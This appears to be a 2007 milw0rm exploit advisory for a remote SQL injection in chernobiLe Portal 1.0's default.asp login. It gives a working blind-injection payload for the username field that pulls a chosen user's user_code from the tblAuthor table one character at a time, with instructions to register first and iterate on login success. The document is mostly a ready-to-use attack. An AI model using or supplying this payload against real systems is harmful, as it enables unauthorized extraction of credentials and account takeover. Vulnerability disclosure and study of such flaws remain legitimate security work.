******************************************************************************* # Title : chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # $$ : Not Free,Private # Info : /* Turk Script Eklememen konusunda guzelce uyarmistim,ukalaca tamam demistin Fakat hala birsey bulmus gibi bazi sitelerde bu raporlarin basligini aciyorsun.Urastigin konuda bari acik birakma.Havani atmaya dvm et. *\ ******************************************************************************* [[SQL]]] http://[target]/[path]//default.asp (POST Method) [SQL] Example: Method: One Char Brute Force Technique First,Please Register Before: User:[username]'/**/and/**/(substring((SELECT/**/user_code/**/FROM/**/tblAuthor/**/WHERE/**/username='targetuser'),1,1))='A'/* Pass:[userpass] If Login True Then First Character = A elSe Continue... [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker! # milw0rm.com [2007-01-27]